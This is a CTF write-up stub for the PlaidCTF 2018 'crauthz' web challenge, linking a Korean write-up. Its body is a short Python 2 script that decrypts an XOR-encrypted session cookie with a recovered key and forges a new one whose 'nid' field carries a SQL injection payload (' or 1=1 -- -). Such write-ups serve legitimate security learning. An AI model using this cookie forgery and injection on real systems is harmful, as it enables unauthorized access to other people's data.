Rating: 5.0
Korean write-up by kimtruth
[https://kimtruth.github.io/2018/05/07/PCTF-2018-crauthz-Web/](https://kimtruth.github.io/2018/05/07/PCTF-2018-crauthz-Web/)
```
import base64
key = 'dcfe4631bf8ef4d90e997dc5fe64fe04dbecf7d6b6d4c5c68aa0c49912563d4ce230561910fbb722f3949548c6011335612f63a8f0e3ab69fd7c465e80e68e22cd0d5e215ba60896f850cb1044231c7c06cb3924956a9af6162ba3b1f6fa'.decode('hex')
def xor(x, y):
return ''.join([chr(ord(xe) ^ ord(ye)) for xe,ye in zip(x,y)])
def encrypt(a):
result = xor(a, key)
return base64.urlsafe_b64encode(result)
def decrypt(enc):
return xor(enc, key)
# test
cookie_str = 'p9wpRtHrhrdv9BjnxETcNenfw_Sa9Oeo48TmozJkCXjaTQ=='
enc = base64.urlsafe_b64decode(cookie_str)
print decrypt(enc) # {"ownername": "1234", "nid": 2448}
print encrypt('{"ownername": "1234", "nid": "2448\' or 1=1 -- -"}')
```